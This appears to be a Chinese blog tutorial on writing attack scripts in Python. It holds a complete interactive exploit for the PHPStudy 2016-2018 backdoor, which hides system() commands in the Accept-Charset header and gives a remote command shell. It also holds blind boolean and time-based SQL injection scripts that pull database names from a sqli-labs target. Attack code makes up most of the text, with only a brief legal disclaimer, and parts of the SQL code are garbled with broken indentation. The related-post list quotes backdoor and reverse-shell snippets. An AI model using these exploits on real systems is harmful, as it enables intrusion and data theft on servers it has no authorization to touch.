python-后门脚本编写

已于 2023-09-23 17:29:54 修改
阅读量339 收藏 2
点赞数
分类专栏: python 文章标签: python 开发语言
于 2023-09-23 17:25:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58265086/article/details/133211664
版权

1. phpstudy 后门脚本编写

# 导入所需模块和库:
python
import requests
import base64
import sys
import re
import random
import string
#代码使用了 requests 库来发送 HTTP 请求,base64 库用于进行 Base64 编码,sys 模块用于获取命令行参数,re #模块用于处理正则表达式,random 和 string 模块用于生成随机字符串。

# 定义脚本的 banner 和用法提示:
python
banner = """
#PHPStudy_2016-2018
...
"""

print(banner)
# 这部分代码定义了一个脚本的标志(banner),在运行脚本时会打印出来,并提供了脚本的使用方法。

# 定义攻击函数 attack(cmd, url):
python
def attack(cmd, url):
    cmd = f'''system("{cmd}");'''
    cmd = base64.b64encode(cmd.encode()).decode()
    headers = {
        "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36",
        "Accept-Encoding"   : "gzip,deflate",
        "Accept-Charset"    : f"{cmd}"
    }

    res = requests.get(url=url, headers=headers)

    html = res.content.decode()
    offset = html.find("<!DOCTYPE html")
    result = html[0:offset].strip()

    return result
# attack 函数用于发送包含命令的 HTTP 请求,并解析响应内容。它首先构造要执行的命令,将其通过 Base64 编码后放入请求的 Accept-Charset 头部。然后,使用 requests 库发送请求,并获取响应内容。接着,从响应内容中截取有效部分(在 <!DOCTYPE html 标签之前的内容),并返回结果。

# 定义生成随机字符串的函数 gen_random_str(l):
python
def gen_random_str(l):
    s = ""
    for i in range(l):
        s += random.choice(string.ascii_letters)

    return s
# 这个函数用于生成指定长度的随机字符串。它使用了 random 模块和 string 模块来生成大小写字母组成的字符串。

# 定义验证漏洞的函数 verify(url):
python
def verify(url):
    random_str = gen_random_str(32)
    cmd = f"echo {random_str}"
    if random_str in attack(cmd, url):
        return True
    else:
        return False
# verify 函数用于验证目标网址是否存在漏洞。它生成一个随机字符串,并构造一个命令,在命令中输出该随机字符串。然后,通过调用 attack 函数发送包含命令的请求,检查随机字符串是否出现在响应内容中。如果出现,则说明目标网址存在漏洞,返回 True;否则,返回 False。

# 处理命令行参数:
python
if len(sys.argv) < 2:
    print(banner)
    exit()

url = sys.argv[1]

print(f"Target: {url}")
#这部分代码判断命令行参数是否足够,并获取目标网址。

# 验证目标漏洞并执行攻击:
python
if not verify(url):
    print(f"The Target is NOT VULNERABLE!")
    exit()

flag = input(f"The Target is VULNERABLE!\nCould you want to continue?[Y/n]")

if flag == "n":
    exit()

info = re.findall(r'http://(.*)/', url)[0]

while True:
    cmd = input(f"<{info}> ")
    if cmd == "exit":
        break
    print(attack(cmd, url))
# 这部分代码首先调用 verify 函数验证目标网址是否存在漏洞。如果不存在漏洞,则输出提示信息并退出脚本。如果存在漏洞,则询问用户是否要继续执行攻击,只有在用户输入 'Y' 或 'y' 时才会继续。然后,进入一个循环,不断接收用户输入的命令,并调用 attack 函数执行攻击并输出结果。

# 需要注意的是,在实际应用中,这样的攻击行为是非法且具有严重风险的。请不要滥用这种攻击脚本,遵守法律法规,并且仅在合法授权的情况下使用。

import requests
import base64
import sys
import re
import random
import string

banner = """
PHPStudy_2016-2018

    ( )                  ( )        ( )                    
    | |_      _ _    ___ | |/')    _| |   _      _    _ __ 
    | '_`\  /'_` ) /'___)| , <   /'_` | /'_`\  /'_`\ ( '__)
    | |_) )( (_| |( (___ | |\`\ ( (_| |( (_) )( (_) )| |   
    (_,__/'`\__,_)`\____)(_) (_)`\__,_)`\___/'`\___/'(_)   

                                                    - AJEST
Usage: python3 *.py http://10.4.7.130/phpinfo.php
"""

def attack(cmd, url):
    cmd = f'''system("{cmd}");'''
    cmd = base64.b64encode(cmd.encode()).decode()
    headers = {
        "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36",
        "Accept-Encoding"   : "gzip,deflate",
        "Accept-Charset"    : f"{cmd}"
    }

    res = requests.get(url = url, headers = headers)

    html = res.content.decode()
    offset = html.find("<!DOCTYPE html")
    result = html[0:offset].strip()

    return result

def gen_random_str(l):
    s = ""
    for i in range(l):
        i
        s += random.choice(string.ascii_letters)

    return s

def verify(url):
    random_str = gen_random_str(32)
    cmd = f"echo {random_str}"
    if random_str in attack(cmd, url):
        return True
    else:
        return False

if len(sys.argv) < 2:
    print(banner)
    exit()

url = sys.argv[1]

print(f"Target: {url}")

if not verify(url):
    print(f"The Target is NOT VULNERABLE!")
    exit()

flag = input(f"The Target is VULNERABLE!\nCould you want to continue?[Y/n]")

if flag == "n":
    exit()

info = re.findall(r'http://(.*)/', url)[0]

while True:
    cmd = input(f"<{info}> ")
    if cmd == "exit":
        break
    print(attack(cmd, url))

2. sql 注入脚本编写

2.1 sql盲注脚本

这段 Python 代码是一个用于获取 SQL 注入漏洞数据库相关信息的脚本,在执行前需要先了解 SQL 注入攻击的原理以及相关的技术细节。

下面对代码进行详细解析:
import requests
import string
代码使用了 requests 库来发送 HTTP 请求,string 模块用于进行字符集的处理。


url = "http://192.168.232.182/sqli-labs/Less-8/"
i = 0
name = " "
c_list = string.printable.strip()
定义目标网址和初始参数:这部分代码定义了目标网址、数据库长度变量 i 和用于存储数据库名称的变量 name,同时使用 string.printable.strip() 函数得到 ASCII 可打印字符集(去掉空格),并赋值给 c_list 变量。


while True:
    i += 1
    payload = f"?id=2' and length(database())= {i} --+"
    full_url = url + payload
    res = requests.get(url=full_url)        
    if "You are in..........." in res.text:
        print(f"数据库长度为{i}")        
        con_len = i        
        break
 获取数据库长度:这部分代码使用了二分法的思想,逐步增加数据库名长度并通过注入判断得出正确的长度。将构造好的 payload 添加到目标网址中,然后使用 requests 库发送请求,从响应结果中判断是否存在检索到数据的提示信息("You are in...........")。如果存在,说明注入成功,打印出数据库长度并退出循环。

 for i in range(con_len):
    i += 1
    for c in c_list:        
        payload = f"?id=2' and ascii(substr(database(),{i},1))= {ord(c)} --+"
        full_url = url + payload               
        res = requests.get(url=full_url)        
        if "You are in..........." in res.text:                
            name += c                
            break
print(f"数据库名为{name}")
#获取数据库名称:
这部分代码构造类似于获取数据库长度的注入语句,通过二分法的思想依次获取数据库名称。在第一层循环中,逐个字符地进行检查;在第二层循环中,对每种可打印字符(除了空格以外)进行尝试,并将 ASCII 码值作为注入语句的参数进行构造。如果注入语句执行成功,则说明当前字符是正确的,将它拼接到 name 变量中;如果失败,则继续尝试下一个字符。最终,在获取完整个数据库名称之后,输出获取的结果即可。


import requests
import string

url = "http://192.168.232.182/sqli-labs/Less-8/"
i = 0
name = " "
c_list = string.printable.strip()
"""
数据库长度
"""
while True:
 i += 1
 payload = f"?id=2' and length(database())= {i} --+"
 full_url = url + payload
 # print(full_url)    
 res = requests.get(url=full_url)
 # print(res)    
 if "You are in..........." in res.text:
     print(f"数据库长度为{i}")        
     con_len = i        
     break
    """
    数据库名称
    """
for i in range(con_len):
    i += 1
    for c in c_list:        
        payload = f"?id=2' and ascii(substr(database(),{i},1))= {ord(c)} --+"           full_url = url + payload               
        res = requests.get(url=full_url)        
        # print(full_url)        
        if "You are in..........." in res.text:            
            name += c            
            break
print(f"数据库名为{name}")

sql延时注入脚本

import requests
import string
url = "http://192.168.232.182/sqli-labs/Less-9/"
i = 0
name = " "
c_list = string.printable.strip()
"""
数据库长度
"""
def get_timeout():
    try:        
        full_url = url + payload        
        res = requests.get(url=full_url, timeout=2)    
    except:        
        return "timeout"    
    else:        
        return res.text
while True:    
    i += 1    
    payload = f"?id=2' and if(length(database())={i},sleep(3),1)--+"    
    full_url = url + payload    
    # print(full_url)    
    if "timeout" in get_timeout():        
        # print(i)        
        break
con_len = i
print(f"数据库的长度为{i}")
"""
数据库名称
"""
def get_name(i,c):    
    try:        
        payload = f"?id=2' and if(ascii(substr(database(),{i},1))={ord(c)},sleep(3),1) --+"        
        full_url = url + payload        
        res = requests.get(url=full_url, timeout=2)    
    except:        
       return "timeout"    
    else:        
    return res.text
    for i in range(con_len):    
     i += 1    
     for c in c_list:        
         get_name(i=i,c=c)        
         # print(full_url)        
         if "timeout" in get_name(i,c):            
         name += c            
         break
print(f"数据库名为{name}")

定义目标网址和初始参数,以及 ASCII 可打印字符集:

url = "http://192.168.232.182/sqli-labs/Less-9/"
i = 0
name = " "
c_list = string.printable.strip()

定义一个函数 get_timeout() 来判断请求是否超时:
def get_timeout():
    try:                
        full_url = url + payload                
        res = requests.get(url=full_url, timeout=2)        
    except:                
        return "timeout"        
     else:                
          return res.text

使用循环逐步增加数据库名称的长度,通过注入语句中执行 sleep(3) 来判断请求是否超时,从而得到数据库名称的长度
while True:    
    i += 1    
    payload = f"?id=2' and if(length(database())={i},sleep(3),1)--+"    
    full_url = url + payload    
    if "timeout" in get_timeout():        
        break
con_len = i
print(f"数据库的长度为{i}")

定义一个函数 get_name(i,c) 来获取数据库名称的每个字符:
def get_name(i,c):    
    try:        
        payload = f"?id=2' and if(ascii(substr(database(),{i},1))={ord(c)},sleep(3),1) --+"        
        full_url = url + payload        
        res = requests.get(url=full_url, timeout=2)    
    except:        
       return "timeout"    
    else:        
       return res.text

嵌套循环来逐个字符地获取数据库名称,通过判断请求是否超时来确定字符的正确性:
for i in range(con_len):    
    i += 1    
    for c in c_list:        
        get_name(i=i,c=c)        
        if "timeout" in get_name(i,c):            
            name += c            
            break
print(f"数据库名为{name}")
手打-通天路
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python编写后门程序
songling515010475的专栏
05-29 1495
帮助命令: >python backDoor.py -h help info : python backDoor.py -h client : python backDoor.py -t [target] -p [port] server : python backDoor.py -lp [port] import socket import getopt import sys import sys import subprocess from threading import Thr..
PYTHON写服务器后门
wocao___的博客
12-15 487
PYTHON写服务器后门(my_netcat.py) 不用上传后门了,服务器支持python2.7即可写入 #!/usr/bin/python import sys import socket import getopt import threading import subprocess #定义一些全局变量 listen = False command = False upload = False execute = "" target = "" upload_destination = "" port
后门程序制作示例+源码
03-08
程序后门制作程序后门制作程序后门制作程序后门制作
Python后门程序编写与远程控制_python编写程序对远程主机进行操控
最新发布
2401_84141332的博客
05-16 384
Python所有方向路线就是把Python常用的技术点做整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。工欲善其事必先利其器。学习Python常用的开发软件都在这里了,给大家节省了很多时间。升级客户端和服务 源码 实现 循环交互。如果要做到远程控制对方主机。升级可以控制服务端程序。先编写一个客户端程序。
python后门
jhui123456的博客
03-27 174
import os mystr=os.popen("tasklist") #popen与system可以执行指令,popen可以接受返回对象 mystr=mystr.read() #读取输出 #print("hello",mystr) cmdlines = os.popen("dir") f = cmdlines.read() print(f ) ...
自己用python写的后门
09-01
无论是windows还是LINUX对python支持都不错,所以写了一个python后门,用起来会很方便,也很稳定
python植入后门backdoor程序的方法?
weixin_33971130的博客
12-18 451
后门程序 from gevent.backdoor import BackdoorServer server = BackdoorServer(('127.0.0.1', 5001), banner="Hello from gevent backdoor!", locals={'foo': "From...
shell:python写的后门连接脚本
04-01
了解这些概念后,我们可以分析"shell-master"这个文件夹,它可能包含了一系列与Python后门脚本相关的源代码、教程或者测试案例。通过学习这些材料,可以加深对网络安全实践的理解,但同时要确保在合法和道德的范围内...
Netray:python写的后门连接脚本
04-06
在编写后门脚本时,Python的优势在于其丰富的网络编程库,如socket、asyncio、paramiko等,这些库可以帮助开发者轻松实现网络通信和加密功能。 在Netray项目中,可能包含以下几个关键知识点: 1. **Socket编程**:...
Sonaris:简单的Python后门
02-14
**Sonaris:简单的Python后门** Sonaris是一个Python编写的后门工具,它为渗透测试者和安全研究人员提供了一种方便的方式来远程控制目标系统。在本文中,我们将深入探讨Sonaris的功能、工作原理以及如何使用它,...
SeayFindShell( linux-python-killwebshell.zip_backdoor_cleariwf_m
09-15
它采用多种签名匹配和行为分析方法,能够识别出多种常见的Web后门脚本,如中国菜刀、小马等。 2. **深度扫描**:不仅检查已知的Webshell,还能够对未知的可疑文件进行深度分析,例如检查文件的执行权限、编码方式、...
Python-一个隐藏的基于Python的Windows后门
08-10
一个隐藏的基于Python的Windows后门,它使用Github作为命令和控制服务器
Oncogene:使用套接字用Python3编写的简单Windows和Linux RATBackdoor + Keylogger
04-14
使用套接字使用Python编写的简单Windows / Linux后门/ RAT + KeyLogger。 笔记 我已经在Linux环境中开发了Oncogene,它可能无法在其他系统上运行。 该后门的目标是Windows(甚至现在是Linux!),但攻击者应该使用...
Grok-backdoor:一款支持Ngrok隧道的强大Python后门工具
Karka_的博客
08-18 188
1、多平台支持,无需交叉编译:Linux、Windows、macOS;2、经过认证授权的Bind Shell;3、随机输出后门代码;4、Ngrok隧道支持绕过防火墙和代理限制;从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
[原]使用python建立后门
PandaraWen 宝盒
11-05 1396
基本思路:     假设:待劫持文件为A.exe;构建后门脚本为backdoor.py;注入使用的DLL为inject.dll;     后门构建的一般思路为:重命名(或者移动)A.exe为xxx.exe,然后在backdoor中创建A.exe的进程--记为processA;然后向processA中注入DLL(学艺未精,不会写shellcode)创建一个反向连接通向服务器端;再向processA中
Python黑客攻防(九)编写后门程序
qq_43681532的博客
07-16 4853
前言 本篇文章讲解如何编写后门程序,并实践测试运行,通过后门程序查找文件。 后门基本概念 防火墙用于拦截用户从外部访问服务器。访问服务器的Telnet、FTP等服务只限允许的用户使用。防火墙并不会阻断用户从内部向外部的访问路径。虽然很难从外部侵入防火墙,但一旦成功,黑客就能轻松窃取敏感信息。后门技术用于绕过防火墙等安全设备,掌控服务器资源。安装于目标服务器的后门客户端会接收并运行来自后门服务器的命令,并将运行结果发送给后门服务器。 利用后门发动攻击时,最困难的是向目标系统安装后门客户端。通过网络直接上传文件
(转)python正向连接后门
weixin_30828379的博客
07-03 182
python正向连接后门 PHITHON 2014 四月 12 00:12 阅读:16670 Python python,cmd后门,socket python在linux下的反弹shell代码我相信很多人都见过: import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.S...
Python安全之编写反弹连接‘免杀’后门
weixin_43853965的博客
01-07 1280
生成后门的工具: 虽然在WEB安全专栏,不过今天要编写的是一个二进制后门,而不是WEB后门。按惯例还是来一段KALI里面的“免杀”后门生成工具,大名鼎鼎的metasploit: 方法一msfconsole: msf5 > use windows/shell/reverse_tcp msf5 payload(windows/shell/reverse_tcp) > set lhost...
python漏扫脚本编写
07-28
编写一个Python漏洞扫描脚本可以涉及以下步骤: 1. 导入所需的模块,如socket、requests等。 2. 定义目标IP地址或域名。 3. 枚举要扫描的端口,可以使用socket模块的connect_ex()函数来检查端口是否开放。 4. 编写漏洞检测函数,根据目标应用程序或服务的漏洞特征编写相应的检测逻辑。 5. 在脚本中调用漏洞检测函数,并输出扫描结果。 6. 可以添加多线程或异步请求,提高扫描效率。 7. 最后,编写主函数来执行扫描操作,包括与用户交互、选择扫描方式等。 下面是一个简单的示例漏洞扫描脚本: ```python import socket target = "example.com" # 目标域名或IP地址 ports = [80, 443, 8080] # 要扫描的端口列表 def scan_port(port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((target, port)) if result == 0: print(f"Port {port} is open") sock.close() def main(): print(f"Scanning {target}...") for port in ports: scan_port(port) if __name__ == "__main__": main() ``` 请注意,这只是一个简单的示例脚本,用于演示基本的端口扫描功能。在实际应用中,需要根据目标应用程序或服务的漏洞特征编写相应的检测逻辑,并且需要注意合法性和法律合规性。此外,建议使用现有的漏洞扫描工具或框架来提高扫描效率和准确性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值